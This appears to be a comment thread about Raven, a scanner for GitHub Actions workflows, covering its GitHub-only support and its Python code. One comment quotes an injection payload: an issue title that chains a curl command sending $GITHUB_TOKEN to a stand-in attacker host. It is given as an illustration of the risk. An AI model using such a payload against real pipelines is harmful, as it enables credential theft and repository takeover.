9 comments

[ 3.3 ms ] story [ 33.8 ms ] thread
Does this only work with github actions?
Seems so, and also only .com not even GHE https://github.com/CycodeLabs/raven/blob/v1.0.3/src/download...

I have no earthly idea why a security tool would roll their own GitHub access library in python :-/

There is no official GitHub SDK for Python. It's easy enough to do it anyway. This is not authentication logic either.
PyGithub has existed for ages, even if it is not official. GitHub only maintains octokit for JS, Ruby, .NET, and Terraform.
This looks like a great tool, how would one go about running this periodically for an org?
`new issue title" && curl hacker.boi -d $GITHUB_TOKEN && sleep 30` I hate pipelines even more :(
The logo reminded me of Raven Software. Good times!